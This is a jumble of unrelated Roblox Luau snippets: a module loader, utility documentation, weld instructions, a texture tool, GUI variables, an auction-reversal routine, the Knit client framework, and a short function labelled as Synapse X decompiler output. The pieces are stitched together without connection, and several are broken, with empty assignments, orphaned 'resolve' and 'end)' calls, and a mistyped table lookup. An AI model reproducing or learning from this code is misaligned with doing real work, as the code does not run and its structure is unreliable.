local Presets = require(script:WaitForChild('Presets')) local Functions = require(script:WaitForChild('Styles')) callback = function(called, ErrorType) return warn('CRATER MODULE ERROR:\n '..called..' does not exist as a '..ErrorType) end return { ['new'] = function(Type : string, AnchorPoint : CFrame, ... : dict) if Functions[Type] then Functions[Type](AnchorPoint, ...) else callback(Type, 'type') end end, ['presets'] = function(Preset : string, AnchorPoint : CFrame, ... : dict) if Presets[Presets] then local Type, Settings = Presets[Preset](...) Functions[Type](AnchorPoint, Settings) else callback(Preset, 'preset') end end, }
--[=[ @within TableUtil @function Truncate @param tbl table @param length number @return table Returns a new table truncated to the length of `length`. ```lua local t = {10, 20, 30, 40, 50, 60, 70, 80} local tTruncated = TableUtil.Truncate(t, 3) print(tTruncated) --> {10, 20, 30} ``` ]=]
local function Truncate(tbl: Table, len: number): Table return table.move(tbl, 1, len, 1, table.create(len)) end
--[[Usage 1. Remove Old welding script (optional, only if updating a weapon and that weapon does not rely on that script) 2. Anchor all parts of tool and put inside of a tool object 3. Place this script in that tool (make sure you do this AFTER step 2, otherwise it may fail) 4. Treat like normal tool, nothing special has to be done with it ]]
-- 5.) Put this in MiscWeld under Weld stuff here:
MakeWeld(car.Misc.Speedo.N,car.DriveSeat,"Motor").Name="N" ModelWeld(misc.Speedo.Parts,misc.Speedo.N)
-- Initialize the tool
local TextureTool = { Name = 'Texture Tool'; Color = 'Bright violet'; -- Default options Type = 'Decal'; Face = Enum.NormalId.Front; -- Signals OnFaceChanged =; } TextureTool.ManualText = [[<font face="GothamBlack" size="16">Texture Tool 🛠</font> Lets you add decals and textures to parts.<font size="6"><br /></font> <b>TIP: </b>Click on any part's surface to quickly change a decal/texture's side.<font size="6"><br /></font> <b>TIP: </b>You can paste the link to any decal and it'll automatically get the right image ID.<font size="6"><br /></font> <b>NOTE: </b>If HttpService isn't enabled, you must manually type an image's ID.]]
-- / UIs / --
local MainGui = script.Parent.Parent local StatsHolder = MainGui.StatsHolder local Health = StatsHolder.Health local HealthDisplayBar = Health.DisplayBar local Oxygen = StatsHolder.Oxygen local OxygenDisplayBar = Oxygen.DisplayBar
--s.Pitch = 0.7
while s.Pitch<1.21 do s.Pitch=s.Pitch+0.010 s:Play() if s.Pitch>1.21 then s.Pitch=1.21 end wait(0.001) end
-------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------
function reverseGlobalMarket(player) local save = _L.Saving.Get(player) if not save then return end if save.HasReversedGlobalMarket then return end wait(2) -- add all auction postings back into the player's inventory local liveAuctions = _L.Functions.CloneTable(save.Auctions) save.Auctions = {} for _, auctionListing in ipairs(liveAuctions) do local quantity = auctionListing.quantity local itemID = auctionListing.itemID local className = auctionListing.className local payload = { quantity = quantity, itemID = itemID, className = className } table.insert(save.ReversedAuctionPostings, payload) _L.Inventory.AddItem(player, className, itemID, quantity) end save.HasReversedGlobalMarket = true end
--[[ Knit.CreateController(controller): Controller Knit.AddControllers(folder): Controller[] Knit.AddControllersDeep(folder): Controller[] Knit.GetService(serviceName): Service Knit.GetController(controllerName): Controller Knit.Start(): Promise<void> Knit.OnStart(): Promise<void> --]]
local KnitClient = {} KnitClient.Version = script.Parent.Version.Value KnitClient.Player = game:GetService("Players").LocalPlayer KnitClient.Controllers = {} KnitClient.Util = script.Parent.Util local Promise = require(KnitClient.Util.Promise) local Loader = require(KnitClient.Util.Loader) local Ser = require(KnitClient.Util.Ser) local ClientRemoteSignal = require(KnitClient.Util.Remote.ClientRemoteSignal) local ClientRemoteProperty = require(KnitClient.Util.Remote.ClientRemoteProperty) local TableUtil = require(KnitClient.Util.TableUtil) local services = {} local servicesFolder = script.Parent:WaitForChild("Services") local started = false local startedComplete = false local onStartedComplete ="BindableEvent") local function BuildService(serviceName, folder) local service = {} if (folder:FindFirstChild("RF")) then for _,rf in ipairs(folder.RF:GetChildren()) do if (rf:IsA("RemoteFunction")) then service[rf.Name] = function(_self, ...) return Ser.DeserializeArgsAndUnpack(rf:InvokeServer(Ser.SerializeArgsAndUnpack(...))) end service[rf.Name .. "Promise"] = function(_self, ...) local args = Ser.SerializeArgs(...) return resolve(Ser.DeserializeArgsAndUnpack(rf:InvokeServer(table.unpack(args, 1, args.n)))) end) end end end end if (folder:FindFirstChild("RE")) then for _,re in ipairs(folder.RE:GetChildren()) do if (re:IsA("RemoteEvent")) then service[re.Name] = end end end if (folder:FindFirstChild("RP")) then for _,rp in ipairs(folder.RP:GetChildren()) do if (rp:IsA("ValueBase") or rp:IsA("RemoteEvent")) then service[rp.Name] = end end end services[serviceName] = service return service end function KnitClient.CreateController(controller) assert(type(controller) == "table", "Controller must be a table; got " .. type(controller)) assert(type(controller.Name) == "string", "Controller.Name must be a string; got " .. type(controller.Name)) assert(#controller.Name > 0, "Controller.Name must be a non-empty string") assert(KnitClient.Controllers[controller.Name] == nil, "Controller \"" .. controller.Name .. "\" already exists") controller = TableUtil.Assign(controller, { _knit_is_controller = true; }) KnitClient.Controllers[controller.Name] = controller return controller end function KnitClient.AddControllers(folder) return Loader.LoadChildren(folder) end function KnitClient.AddControllersDeep(folder) return Loader.LoadDescendants(folder) end function KnitClient.GetService(serviceName) assert(type(serviceName) == "string", "ServiceName must be a string; got " .. type(serviceName)) local folder = servicesFolder:FindFirstChild(serviceName) assert(folder ~= nil, "Could not find service \"" .. serviceName .. "\"") return services[serviceName] or BuildService(serviceName, folder) end function KnitClient.GetController(controllerName) return KnitClient.Controllers[controllerName] end function KnitClient.Start() if (started) then return Promise.Reject("Knit already started") end started = true local controllers = KnitClient.Controllers return -- Init: local promisesStartControllers = {} for _,controller in pairs(controllers) do if (type(controller.KnitInit) == "function") then table.insert(promisesStartControllers, controller:KnitInit() r() end)) end end resolve(Promise.All(promisesStartControllers)) end):Then(function() -- Start: for _,controller in pairs(controllers) do if (type(controller.KnitStart) == "function") then task.spawn(controller.KnitStart, controller) end end startedComplete = true onStartedComplete:Fire() task.defer(function() onStartedComplete:Destroy() end) end) end function KnitClient.OnStart() if (startedComplete) then return Promise.Resolve() else return Promise.FromEvent(onStartedComplete.Event) end end return KnitClient
-- Decompiled with the Synapse X Luau decompiler.
local u1 = math.pi * 2; return function(p1) if p1 < 0 then p1 = p1 + (math.floor(-p1 / u1) + 1) * u1; end; return p1 % u1; end;